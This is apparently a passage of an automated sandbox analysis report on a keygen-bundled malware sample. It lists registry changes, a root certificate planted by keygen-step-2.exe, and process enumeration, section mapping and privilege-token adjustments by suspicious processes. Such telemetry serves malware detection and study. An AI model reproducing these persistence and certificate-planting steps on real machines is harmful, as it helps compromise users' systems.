\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{90531C29-8F39-4FE3-BFBD-D2C90E987461}" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\Total = "76" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{QJ2559JN-BF7A-LM2A-20M4-JBF9M43Q7G3S}\1 = "4484" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CRLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "48" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\NextUpdateDate = "325741175" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\dollarsurvey.org\ = "1068" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\LastClosedWidth = "800" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates\4EEF7FAF0062D34ABEE = 0300000001000000140000004eef7faf0062d34abee6137e774438ae9988739f04000000010000001000000024d7172657e6b799f66cf32ae88b5c280f0000000100000020000000547b3c62613c9c2b025d5461623ae703e9853ee45a8bf3b425bf63528e992912140000000100000014000000fe7e60dd9d8292295edf1cf80869a75b98896ed01900000001000000100000002aac2185e0e1b6503eb16a495b1815fc5c0000000100000004000000000800001800000001000000100000002d581a49c8eb5b3b3c6ef9bb65314d702000000001000000eb050000308205e7308203cfa003020102021333000001a636dabe8bbe573d9a0000000001a6300d06092a864886f70d01010b0500307e310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e312830260603550403131f4d6963726f736f667420536563757265205365727665722043412032303131301e170d3231303331313139323835325a170d3232303631313139323835325a3081a9310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e310d300b060355040b130442696e67311b301906035504031312494520496e737472756d656e746174696f6e3127302506092a864886f70d010901161862696e6769657465616d406d6963726f736f66742e636f6d30820122300d06092a864886f70d01010105000382010f003082010a0282010100d0b49f5b650f0fa690df343367a2cd62155e98e3c0fc14cb1f696618be8c327ef257f50d47bce3a4286e36edc0382e0ac81096dbce62463bb552970d01d02a7ca642d6faed9b5878c4e2e33e7c9f94ea4eb7f125662d5d2fe78138ce3e827bd98969028a908fab20632542a1ef952c10382b7efcaae1f5e7521d5fb617a93aa002b579a3203726111c73a9832712e3b5d4d140b247c91824de8123b45ea39fbcdb6e5c77d68cd3db64dd24844a1879865356f655cf1c5d94b208e244bd075a9823c87af7bcad6aab52e3444aad2947a7baad0d42c9d785964dbd8b4e09004359094d0646c3ca98e7c698b0fa7d6f1606b1459fd6df8d9aea8ae85911789bc5e10203010001a38201303082012c300e0603551d0f0101ff0404030204f030150603551d25040e300c060a2b0601040182374c0c01301d0603551d0e04160414fe7e60dd9d8292295edf1cf80869a75b98896ed0301f0603551d230418301680143656896549cb5b9b2f3cac4216504d91b933d79130530603551d1f044c304a3048a046a0448642687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63726c2f4d69635365635365724341323031315f323031312d31302d31382e63726c306006082b0601050507010104543052305006082b060105050730028644687474703a2f2f7777772e6d6963726f736f66742e636f6d2f706b696f70732f63657274732f4d69635365635365724341323031315f323031312d31302d31382e637274300c0603551d130101ff04023000300d06092a864886f70d01010b05000382020100c1055e1c6ece899cbff031668bd0b72ee668484f9392c48efe112ba21c521af47582849539f2fd53f7f8adecc243743211150de90b106e6bdaaedb88a8fc71aff2bd4bfeae5628507aa3b47095bf680a0a56bc6cb9c70871fa0b05857bf1762af884469264870c4139f7f9e93bbedaf73a867994c51e7c8473506f1ca68a8f9059cfa5c068be7ecade98315eebd7e71431ebe7d033b4fc8056d94ab70b03e1368082fc83a82cd632b9f3a03f9c9d51881c39b432ee9856e87835bc0481e57489da3590d20b2b9b0900704de861f994d956a2c0347178c59e5048bb9bbfbe8cef237d5860d7f407dcbce486eee7d98a90509a8f1b81445453326b139f0d2fdc68b831681fa96f2284b8153e3dbe60cb2d0ac030d0e2ecfc85c9d361c25e01cabe57cd6ebdc40708b2bd449152e90d2d45d725db856ab64d29a9fdb9fdb85f6354cbd5be240f4b71fa745db8eb32c0e4ea4747bfa5a4f9a5346e42b3379636d05e52225cea1baa7792b8f51b803658026b11fd0ab5877a99f4e74ff994c61177ea425554a7135d8b020661d2d285eb8bf1aa00d3bf78e2f5dba62cd7befdb85fffe6c1b65643f56fe36cf412f366b03bc8c78c852c1ed43a218256636d67eb8241477d3258af4f96b9698b0326d6d01826734eb18f1b393cbf85c0f9fdab4fb854536110f2f678003f80f270cbb1fbeb5ba09523f959dfeba84319577874e4dec0 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\Certificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\CTLs MicrosoftEdge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Unicode.Application Free.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate\NextUpdateDate = "325742902" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\CRLs MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\Total\ = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CacheLimit = "256000" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PageSetup MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdgeCP.exe -
Processes:
keygen-step-2.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 keygen-step-2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e keygen-step-2.exe -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 4732 PING.EXE 4236 PING.EXE 5532 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exesvchost.exe4081858.exekey.exeultramediaburner.tmpfilee.exe8CEF.tmp.exekabo.exeirecord.tmppid process 2368 rundll32.exe 2368 rundll32.exe 388 svchost.exe 388 svchost.exe 388 svchost.exe 388 svchost.exe 3164 4081858.exe 3164 4081858.exe 3164 4081858.exe 2064 key.exe 2064 key.exe 4888 ultramediaburner.tmp 4888 ultramediaburner.tmp 5000 filee.exe 5000 filee.exe 5000 filee.exe 5000 filee.exe 5000 filee.exe 5000 filee.exe 5000 filee.exe 5000 filee.exe 5296 8CEF.tmp.exe 5296 8CEF.tmp.exe 5596 kabo.exe 5596 kabo.exe 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 2492 6016 irecord.tmp 6016 irecord.tmp 2492 2492 2492 2492 2492 2492 2492 -
Suspicious behavior: MapViewOfSection 45 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.exekabo.exeexplorer.exeexplorer.exefbvhagtfbvhagtfbvhagtpid process 4580 MicrosoftEdgeCP.exe 4580 MicrosoftEdgeCP.exe 3192 MicrosoftEdgeCP.exe 5596 kabo.exe 3192 MicrosoftEdgeCP.exe 3192 MicrosoftEdgeCP.exe 2492 2492 2492 2492 2492 2492 4412 explorer.exe 4412 explorer.exe 2492 2492 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2468 explorer.exe 2492 2492 2492 2492 4160 fbvhagt 5488 fbvhagt 2468 explorer.exe 2468 explorer.exe 3192 MicrosoftEdgeCP.exe 3192 MicrosoftEdgeCP.exe 2468 explorer.exe 2468 explorer.exe 3192 MicrosoftEdgeCP.exe 3192 MicrosoftEdgeCP.exe 2468 explorer.exe 2468 explorer.exe 1020 fbvhagt -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
rundll32.exesvchost.exeJoSetp.exesvchost.exedescription pid process Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeTcbPrivilege 388 svchost.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 3264 JoSetp.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeDebugPrivilege 2368 rundll32.exe Token: SeAssignPrimaryTokenPrivilege 2420 svchost.exe Token: SeIncreaseQuotaPrivilege 2420 svchost.exe Token: SeSecurityPrivilege 2420 svchost.exe Token: SeTakeOwnershipPrivilege 2420 svchost.exe Token: SeLoadDriverPrivilege 2420 svchost.exe Token: SeSystemtimePrivilege 2420 svchost.exe Token: SeBackupPrivilege 2420 svchost.exe Token: SeRestorePrivilege 2420 svchost.exe Token: SeShutdownPrivilege 2420 svchost.exe Token: SeSystemEnvironmentPrivilege 2420 svchost.exe Token: SeUndockPrivilege 2420 svchost.exe Token: SeManageVolumePrivilege 2420 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2420 svchost.exe Token: SeIncreaseQuotaPrivilege 2420 svchost.exe Token: SeSecurityPrivilege 2420 svchost.exe Token: SeTakeOwnershipPrivilege 2420 svchost.exe Token: SeLoadDriverPrivilege 2420 svchost.exe Token: SeSystemtimePrivilege 2420 svchost.exe Token: SeBackupPrivilege 2420 svchost.exe Token: SeRestorePrivilege 2420 svchost.exe Token: SeShutdownPrivilege 2420 svchost.exe Token: SeSystemEnvironmentPrivilege 2420 svchost.exe Token: SeUndockPrivilege 2420 svchost.exe Token: SeManageVolumePrivilege 2420 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2420 svchost.exe Token: SeIncreaseQuotaPrivilege 2420 svchost.exe Token: SeSecurityPrivilege 2420 svchost.exe Token: SeTakeOwnershipPrivilege 2420 svchost.exe Token: SeLoadDriverPrivilege 2420 svchost.exe Token: SeSystemtimePrivilege 2420 svchost.exe Token: SeBackupPrivilege 2420 svchost.exe Token: SeRestorePrivilege 2420 svchost.exe Token: SeShutdownPrivilege 2420 svchost.exe Token: SeSystemEnvironmentPrivilege 2420 svchost.exe Token: SeUndockPrivilege 2420 svchost.exe Token: SeManageVolumePrivilege 2420 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2420 svchost.exe Token: SeIncreaseQuotaPrivilege 2420 svchost.exe Token: SeSecurityPrivilege 2420 svchost.exe Token: SeTakeOwnershipPrivilege 2420 svchost.exe Token: SeLoadDriverPrivilege 2420 svchost.exe 